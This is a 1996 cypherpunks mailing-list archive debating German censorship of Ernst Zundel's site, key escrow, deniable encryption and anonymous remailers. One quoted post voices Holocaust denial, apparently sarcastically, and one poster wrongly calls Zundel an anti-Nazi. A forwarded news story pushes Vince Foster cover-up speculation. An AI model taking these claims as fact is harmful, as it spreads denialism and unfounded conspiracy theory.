Message-ID: <El36C4y00YUrQg7T8x@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 28-Jan-96 Re: "German service cuts
Ne.. by "James A. Donald"@echequ 
> The German prosecuters are currently targeting the site of Mr Zundel, "who
> is well known for his open revisionist positions."
>  
>  
> Zundel is not in fact a Nazi, but an anti nazi:  Here is a sample
> of his work.
>  
> Bottom line.  German prosecuters are amazingly ignorant idiots.

You're actually quoting from an inspired bit of trolling. See my recent
message: "Ernst Zundel impersonator on Usenet"

Whatever he is, Zundel is not an anti-Nazi. He's perhaps the world's
leading holocaust revisionist, and is now living in Canada. He's
well-known to our northern neighbors; his trial for speech crimes went
all the way to the Canadian Supreme Court. His web site is at:

       http://www.webcom.com/~ezundel/english/

But I agree with your basic point. For trying to censor the Internet,
German prosecutors are amazingly ignorant idiots.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Mon, 29 Jan 1996 09:25:15 +0800
To: olmur@dwarf.bb.bawue.de (Olmur)
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <2.2.32.19960128115634.00977b14@panix.com>
Message-ID: <310c0c26.30666226@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996 21:41 +0100 (MET), Olmur wrote:

> It's illegal in Germany to publish material denying the holocaust.  In
> the same moment this guy sent his book (?) per snail-mail from Canada
> to Germany he commited a crime here in Germany.

How pray tell is a person in Canada supposed to know that?  I (in the
US) certainly had no idea Germany had such a law.

Are you saying that, if I ran a bookstore, and accepted international
mail orders, I would have to screen every order to ensure I did not
ship something offensive to the German government?  And if I did fill
such an order, and without ever having set foot in Germany, I could be
arrested on my next trip to Europe, extradited to Germany, and
imprisoned for doing something that is constitutionally protected in
the US?

Alternatively, what if I were to post to usenet a message denying the
Holocaust, and one person in Germany retrieved that message.  Would I
then be subject to arrest and extradition to Germany?


Mike Duvos wrote in another message:

> It is interesting to note that there is no specific law
> prohibiting free speech for Holocaust Agnostics in Germany. The
> actual laws under which such cases are prosecuted are libel laws,
> which have been liberally interpreted to mean that one may not
> "libel" deceased Jews as a class or their memory in the minds of
> their surviving relatives.

If in fact this is merely a judicial interpretation of an apparently
unrelated law, it just plain ridiculous to expect people in other
countries to be aware of it.


If this is really what Germany wants, then it sounds like time to
totally cut Germany off from the internet, simply in self
preservation.  No one can reasonably be expected to research even the
clearly-written laws worldwide that might conceivably apply in such
cases, much less far-fetched judicial interpretations of such laws.


Olmur continued:

> I don't think it's astonishing that Denmark imprissoned this guy and
> transported him to Germany.  It's a normal thing that one country
> imprisons a criminal another country is searching and the delivers
> him/her to the country in question.

I, on the other hand, find this QUITE astonishing.  His actions were
legal in both Canada and Denmark (probably everywhere in the world
except Germany), and he did nothing in Germany.

Of course, I find the US actions in kidnapping people in other
countries quite indefensible also, but at least in those cases the
persons involved clearly knew they were violating at least US law, and
in most cases were violating their local laws as well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Mon, 29 Jan 1996 15:43:07 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Big Lie
In-Reply-To: <ad311df817021004e4bb@[205.199.118.202]>
Message-ID: <m0tgnk9-000jVXC@gti.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Timothy C. May:
: 
: Like many born after the Second World War, I took it as a fact that the
: so-called Holocaust actually happened. I saw pictures of death camps,
: interviews with survivors, etc.
: 
: But if it really happened, why are so many countries trying to suppress the
: evidence that it was all just a CIA-Mossad plot? It seems more likely that
: the pictures were faked, or were pictures taken of dying Germans in Russian
: POW camps on the Eastern Front.
: 
: 

I also saw quite a few pictures that were taken by relatives during the 
liberation (or whatever you call it) and the holocaust was very real.
I will say that the number of Poles that were incarcerated was quite
understated.  Maybe Lester Bangs was right when he said that the
Holocaust was just a coverup to hide the fact that Hitler killed 
6 million Jehovah's Witnesses.  All I can say is that I have seen good
proof that we should not trust the whims of any government.  Human
beings with power over other human beings scare me beyond belief.


- -----
Mark Rogaski           100,000 lemmings     rogaski@pobox.com 
aka Doc, wendigo        can't be wrong!     http://www.pobox.com/~rogaski/

VMS is as secure as a poodle encased in a block of lucite 
						... about as useful, too.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQxxsdT48ZIkMoEtAQFtewf+NsW6wtzL49+U1WxT/1HETpmJT1T91Gvz
7WSA0Cq740yeen0HR6g0m5VtsLrzuGn/zEKKM9KtLDzYIFrGsxliY2Tlc/LpvMqS
zScbEEJgMa4Jvu7/svTMq9vgs4trArFTSFZ40DWx7VsbKovrDXeMfqBi3mI/BaSA
zg0evQnVaubAkg5Zr2Vc3dJf6rvcU9sApCyLYKr0PLRfQ0wNHEli/DZFrrUkFcX6
QeBO2UAZ3vUJgaak6uxoXD7x0ad5WQdeWEz3mJq7LQeUaVHAag9wELOEKLESLhTs
nR1RKJrPIvLNBhm0zqfGswvr1dWtTG7OMnrLNEkiYkfS76Zm+6SCaw==
=Is1w
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 29 Jan 1996 18:43:40 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's misleading statements
Message-ID: <199601291015.CAA16990@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:12 PM 1/28/96 -0500, Ben Samman. wrote:
>There's quite a few folks in the Yale CS department that are pro-Clipper
>or fence sitters.  They justify it in class by claiming that law
>enforcement needs these abilities if LE is to remain effective. 

They're quite correct - it's a problem of values and goals,
and theirs differ from mine.  IF law enforcement is to be effective
(at those things it's effective at, like self-preservation and
politician-electing), then it WILL need this increase in power.
Because otherwise we WILL move to crypto-anarchy.  I hope we will
anyway, and perhaps the tackiness of the Clipper forces will 
encourage the general public to get there faster rather than slower.

BTW, the reason Swiss banking laws were so strong for so many years
was because the Nazis were pressuring bankers to give out information
on their Jewish customers...
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 29 Jan 1996 18:34:36 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's misleading statements
Message-ID: <199601291016.CAA16996@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:54 PM 1/28/96 -0500, perry@piermont.com wrote:

>Well, not really. Silvio Micali did some work on this topic.

Er, yes - Micali's term "fair cryptosystem" outranks even "key escrow"
on my outragious pro-government toadyism bogometer .....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 30 Jan 1996 02:35:53 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <199601291021.CAA17319@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 PM 1/27/96 -0800, shamrock@netcom.com (Lucky Green) wrote:
>Wonder how long before they will include gereral purpose proxies in the
>proposed ban.
>We should start a "banned websites pool". If a site gets banned, the
>controversial content will be mirrored at all other sites. There are enough
>ISPs on this list to make that happen. Will they have the courage?

If I were running an ISP, I wouldn't go providing free host space for a
mirror of Nazi files just because they'd been banned (and an obvious
scan is to go claiming you've been banned just to get free space.)
On the other hand, an HTTP relay site would be a highly reasonable
service, perhaps with NNTP relaying as well.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 29 Jan 1996 15:51:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Downsizing the NSA
In-Reply-To: <Pine.SV4.3.91.960128050809.19570B-100000@larry.infi.net>
Message-ID: <199601290722.CAA21466@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
> just do the right thing: admit that the Soviet threat is no more,
> congratulate the victors, and downsize by 20,000 employees?

Alan Horowitz writes:
# You didn't read about it in the _Baltimore Sun_, so obviously it must not 
# have happened?

Where do you propose that these 20,000 mathematicians went?  Did they take
advantage of the unmet demand for math professors ? <snort>
Please share your evidence for this dramatic employment shift with the rest 
of us.

Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 31 Jan 1996 19:46:56 +0800
To: John Young <jya@pipeline.com>
Subject: Re: The Politics of Mistrust
Message-ID: <v02140a04ad31aab33bfa@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:31 1/28/96, John Young wrote:

>
>   While not directly related to technical crypto, a number
>   of findings parallel discussions here about the diminution
>   of personal and economic security. Samples:

My personal reason for mistrusting the Government is that it uses Coercive
Power to steal money from me (via "taxes" such as FICA) claiming that I am
buying Benefits for myself such as SS and Medicare yet it does not meet the
obligation to supply these services under the promised terms when I
need/want them. If SS and Medicare were run by a private company and
operated the way the Government changes the rules, all of Top Management
would be in Prison for Fraud (and a number of other charges). Any Benefits
program that the Government uses its coercive power to force me to join and
pay for should be REQUIRED to maintain the terms in place when the payments
were collected (ie: There should be no unilateral alteration of the terms
by the Government). The ONLY program that I can think of where this has
even partly occurred is with IRAs (all payments prior to year X are treated
under the original tax rules while payments into an IRA after that date
have a new tax status). All other programs are subject to rules
modification (ie: reductions of promised/paid-for Benefits) or Congress
defunding at a moments notice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 31 Jan 1996 19:54:12 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Multi-plaintext decryption (Was: Re: "Concryption" Prior Art)
In-Reply-To: <01I0JULCV3Z4A0UMAT@mbcl.rutgers.edu>
Message-ID: <199601290804.DAA21491@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Allen writes:
> 	A section of data is placed at the beginning of the encrypted material.
> When it is decrypted or encrypted (depending on how one wants to work things)
> with a given passphrase, it turns out a series of bits, reiterated as needed.
> Each x bits is used to say how far along in the encrypted material the next
> piece of information making up one encrypted message (using the same
> passphrase) is. If you put in a different passphrase, you get a different
> series of bits, and thus use a different set of information for the encrypted
> material. 

This general concept crops up periodically here. As near as I can make out,
the object of the exercise is to be able to demonstrate an innocuous 
decryption of a piece of ciphertext which also has alternate corresponding 
plaintext messages.  Any scheme for this seems to depend upon the secrecy of
the algorithm, among other factors. If an adversary has some inkling that a
piece of ciphertext may represent multiple plaintexts, then she is unlikely to
be fooled by protestations to the contrary. So IMHO it is rather pointless to
debate possible designs for such a scheme. Those who remain interested would
do well to read the various previous discussions about this in the archives.

Futplex <futplex@pseudonym.com>			"Of course I'm celebrating! 
		Dallas only wins the Super Bowl once a year, you know...."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQx/QinaAKQPVHDZAQEjnQf/V2yiLJd8GewrywSZJrgrrUI4/IlW3pWU
5Az+rIEc0AIeGX9h3C5S8UzyLwbgLsOSvMEvtHchwGyjJf+JpROcr7OtvGjNp2Fz
WywxAuginz9YZ6+u0HTyHWPMYuCmXXcskEnuArhROVdD9ZIb1QvuOPoK9Nf7VMBs
4SaOyDphDtNa1vBqaKKr91ZPGu0Tv8sHLwBkzbJRkKRQNnSD6gEdp6JbElGAnl25
Od5BB9xdqizad5HI/1kQQjh9M65z92QHPVAH8UGyARXT+Xn+fF5Cq0Rs8WAWUELn
xIt8eAiQuExZzJB+96JP7m6TUBa/THrpmhEgEp4zMdT89q0HWosAWQ==
=lNCq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 29 Jan 1996 16:44:24 +0800
To: cypherpunks@toad.com
Subject: Decrypting the "MIG Group"
Message-ID: <Pine.BSD.3.91.960129031748.3039C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
            A 01 29 96 Electronic Telegraph newsstory 
            ----------------------------------------- 

               Riddle of spooks in the White House 
 
                   BY AMBROSE EVANS-PRITCHARD 
 
                           reports: 
  
     Official logs kept by the US secret service...indicate that 
     a top White House aide, Patsy Thomasson, met a team of secret 
     service technicians at her office on the night of Mr Foster's 
     death. 
 
 
  Evans-Pritchard writes: 
 
     ...logs kept by Secret Service staff at the White House --pub- 
     lished in Senate documents on the death of Mr Foster-- show that 
     a so-called "MIG Group" was checked into offices occupied by 
     Miss Thomasson and her boss, David Watkins...at 7.10 pm on July 
     20, 1993. 
  
     Miss Thomasson was the only member of the White House staff log- 
     ged into the office at the time.  She checked out at the same 
     time as the "MIG Group" at 7.44 pm.... 
 
 
  E-P inquired about MIG, but-- 
 
     The press spokesman for the Secret Service at first said that 
     he had not heard of the acronym "MIG". 
 
     The next day he changed his account, saying that the "MIG Group" 
     was a team of Secret Service technicians that had gone to Miss 
     Thomasson's office that night to conduct a routine alarm check. 
     He said he could not divulge what the acronym MIG stood for be- 
     cause the unit was secret. 
 
 
  However, 
 
     Intelligence sources have told The Sunday Telegraph that "MIG" 
     stands for "military intelligence group".  MIG groups are typi- 
     cally known as Technical Services Counter-Measure teams (TSCMs), 
     highly classified units that handle high-tech counter-espionage. 
     Their duties, for example, include sweeping for bugs at the 
     White House. 
 
     Sources say that the high-tech counter-espionage staff at the 
     White House are controlled and operated by the Federal Emergency 
     Management Agency, known as FEMA.  This agency...has enormous 
     power and can draw freely on the capabilities of the CIA, the 
     FBI, and the Pentagon. 
 
 
  E-P concludes: 
 
     ...[The logs] add to the growing weight of evidence that a tiny 
     group at the White House was tipped off early about Foster's 
     death, long before the official notification at 8.30 pm.  It 
     would have provided a window of at least an hour to cover things 
     up before anybody was alerted.
   
     If so, America is facing a White House scandal that is every bit 
     as serious and nasty as Watergate. 
 
 
  The Electronic Telegraph can be accessed at: 
 
                    http://www.telegraph.co.uk 
 
 
  The newsstory is under World News.  Its online filename is wamby- 
  27.html. 
 
 
  Cordially, 
 
  Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Tue, 30 Jan 1996 03:50:31 +0800
To: cypherpunks@toad.com
Subject: pgp on linux
Message-ID: <199601290513.FAA30591@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


i can't seem to get pgp compiled on my linux machine. where should i ask
about this?- since cypherpunks would be a bad choice. thanks.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 30 Jan 1996 02:42:37 +0800
To: cypherpunks@toad.com
Subject: Re: The French do some things right...
Message-ID: <2.2.32.19960129105209.00995504@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:01 PM 1/26/96 -0800, Timothy C. May wrote:

>One thing I have been hoping for as America's scandal-fixated society asks
>whether Bill inhaled, whether Rush has a mistress, whether Madonna's
>grandmother is really shacked up with a 19-year-old musician...one thing I
>have been hoping for is that the American public will say "Enough!"

This is one I've never worried about.  As I look around at work and see the
disorderd personal lives and body piercings of my fellow workers, it is
obvious that the amount of that sort of social control that is being applied
is way down.  And since fewer and fewer of us will have to (be able to) work
for large soulless bureacracies as these things are ruthlessly downsized by
the market, we will have much greater choice of employers.  One would have
to be really way out  on one of the unfortunate tails of a bell curve
distribution to be unable to find someone to work with.

DCF







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Tue, 30 Jan 1996 05:18:48 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <HD5FiD82w165w@bwalk.dm.com>
Message-ID: <310c59a4.2517065@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996 22:18:28 -0500 (EST), Dr. Vulis wrote:

> Very little crypto relevance in the following...

Agreed.  I'll not be posting further on this topic here.  If you'd
care to pursue this E-mail, I have no objection.


> lull@acm.org (John Lull) writes:

> > If this is really what Germany wants, then it sounds like time to
> > totally cut Germany off from the internet, simply in self
> > preservation.

> I'm sure this is what the German government and many German people really want.

If so, then they have the power to make that decision, and to
(largely) enforce it.  By doing so, however, they would (and should)
lose all the benefits of the internet as well.


> But, would you also argue that the former Soviet Union should not have been
> allowed on Internet because some of the information that would enter it via the
> internet would have been illegal there? I read that Singapore is similarly
> trying to restrict its citizens' access to the net.

I would argue that ANY country which actively tries to restrict
information providers in other countries through these "long arm of
the law" tactics, ought to be banished from the internet. 

If France wants to outlaw postings in English, I have no legitimate
right to complain -- so long as they limit it to postings from France.
If they were to begin arresting those from England, or Canada, or the
US, however, for posting in English, they would have gone too far.

Attempting to limit what comes into your country via filtering,
restrictions on your own carriers, prosecution of your own citizens or
other residents of your country for violations of your own laws, etc.
is one thing.  Trying to apply your laws to those in other countries,
however, is quite another.


> I think it would be more
> honorable to provide Germans with tools to access the information they want,
> even it violates their laws that we consider to be unjust.

Developing tools to access information is worthwhile.  But successfull
attacks on those providing information makes access tools worthless.
If the information simply isn't there, all the nice access tools in
the world can't create it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 29 Jan 1996 23:12:04 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199601291450.GAA29716@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 29 Jan 96 6:45:43 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nymrod   nymrod@nym.alias.net                  *+***+*    10:20  99.99%
pamphlet pamphlet@idiom.com               +-++++++++++    44:43  99.99%
ecafe    cpunk@remail.ecafe.org           #####*###*##     6:24  99.98%
c2       remail@c2.org                    +**+********    16:42  99.96%
flame    remailer@flame.alias.net         ++-++++--+++  2:20:51  99.96%
ford     remailer@bi-node.zerberus.de     -+___.-+--++ 13:18:57  99.96%
tjava    remailer@tjava.com               ** ###-*####     3:55  99.94%
alpha    alias@alpha.c2.org               #**** ******     3:33  99.89%
mix      mixmaster@remail.obscura.com     -------++-+   1:34:41  99.83%
alumni   hal@alumni.caltech.edu           *#+ *+*+-+##    17:44  99.82%
portal   hfinney@shell.portal.com         *## # #*#+*#     2:10  99.72%
hroller  hroller@c2.org                   ############      :31  99.53%
penet    anon@anon.penet.fi               .__--.._ .-  27:57:50  97.03%
shinobi  remailer@shinobi.alias.net       + #+### ####  2:06:45  94.21%
extropia remail@extropia.wimsey.com       ...-_.-_.    24:28:54  92.68%
rahul    homer@rahul.net                  *+***--** ##    17:20  99.69%
vishnu   mixmaster@vishnu.alias.net       +****   +*+*    14:48  83.47%
replay   remailer@replay.com                        **     6:00  56.93%
hacktic  remailer@utopia.hacktic.nl                 **     8:12  55.13%
bsu-cs   nowhere@bsu-cs.bsu.edu           *                8:49   8.99%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 29 Jan 1996 23:55:26 +0800
To: ampugh@mci.newscorp.com>
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <199601291519.HAA21441@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:43 PM 1/28/96 MET, Olmur wrote:
>The difference is, that the German government was not ordering this
>block.


German prosecutors are sending intimidating messages to various ISPs.

Some ISPs are more easily intimidated than others.   

The messages fall short of saying "You will be prosecuted if 
you do not obey", but they do say "You may be prosecuted if you
do not obey."
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 30 Jan 1996 00:02:02 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <199601291519.HAA21463@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:08 PM 1/28/96 -0800, sameer wrote:
>	When I worked for Walnut Creek CDROM they had to remove
> "Castle Wolfenstein" from one of their CDs because they wouldn't have
> been able to ship to Germany if they didn't.

In "Castle Wolfenstein" you run around shooting Nazis, just as in
"Doom" you run around shooting demons.

And similarly Zundel is not a Nazi, he is an anti fascist.

Hmm, these "Anti nazi laws" look suspicious like pro Nazi laws.

Seems that the government of Germany is primarily concerned about
their own hurt feelings, and to hell with the hurt feeling of the
Jews.






>
>-- 
>Sameer Parekh					Voice:   510-601-9777x3
>Community ConneXion, Inc.			FAX:     510-601-9734
>The Internet Privacy Provider			Dialin:  510-658-6376
>http://www.c2.org/ (or login as "guest")		sameer@c2.org
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 30 Jan 1996 07:41:15 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <310c59a4.2517065@smtp.ix.netcom.com>
Message-ID: <mPTgiD94w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


lull@acm.org (John Lull) writes:
> On Sun, 28 Jan 1996 22:18:28 -0500 (EST), Dr. Vulis wrote:
>
> > Very little crypto relevance in the following...
>
> Agreed.  I'll not be posting further on this topic here.  If you'd
> care to pursue this E-mail, I have no objection.

This should be my last comment to the list in this thread...

> > lull@acm.org (John Lull) writes:
>
> > > If this is really what Germany wants, then it sounds like time to
> > > totally cut Germany off from the internet, simply in self
> > > preservation.
>
> > I'm sure this is what the German government and many German people really w
>
> If so, then they have the power to make that decision, and to
> (largely) enforce it.  By doing so, however, they would (and should)
> lose all the benefits of the internet as well.

Even if 99% of Germans don't wish to be on the net, and 1% do, it would be
an honorable thing to help that 1%; e.g. by providing the tools to
circumvent their laws that we consider to be unjust. IMO, It's not fair to
blame each and every inhabitant of a country for the actions of their
government, even if it's democratically elected.

> Developing tools to access information is worthwhile.  But successfull
> attacks on those providing information makes access tools worthless.
> If the information simply isn't there, all the nice access tools in
> the world can't create it.

So, develop the tools to make the (illegal) flow of information easier and
the prosecution more difficult. E.g., the former Soviet Union couldn't stop
its people from listening to Western propaganda on short-wave radio,
although it was illegal, and more repressive governments did confiscate all
short-wave radios in the past.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 30 Jan 1996 07:24:47 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <199601290738.XAA25006@netcom13.netcom.com>
Message-ID: <39TgiD95w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:

> olmur@dwarf.bb.bawue.de (Olmur) writes:
>
>  > Free speech ends where other people can reasonable claim
>  > that their feelings are badly hurt.
>
> Excuse me?  That line is definitely .sig file fodder.

Olmur, you've hurt my feeleings. Go away. :-)

>  > Is it constitutionally protected in US to knowingly hurt
>  > other people's feelings and to trample on graves?????
>
> Of course it is.  What a silly question.  My feelings get hurt on
> Usenet almost every day and you don't see me whining about it.

Physically trampling on graves may be against some sort of laws.
Inciting others to trample on graves is speech.

>  > Due to our history publishing NAZI-propaganda is forbidden
>  > in Germany. The big majority in Germany agrees with this
>  > view, that NAZI-propaganda doesn't fall under 'free speech'.
>
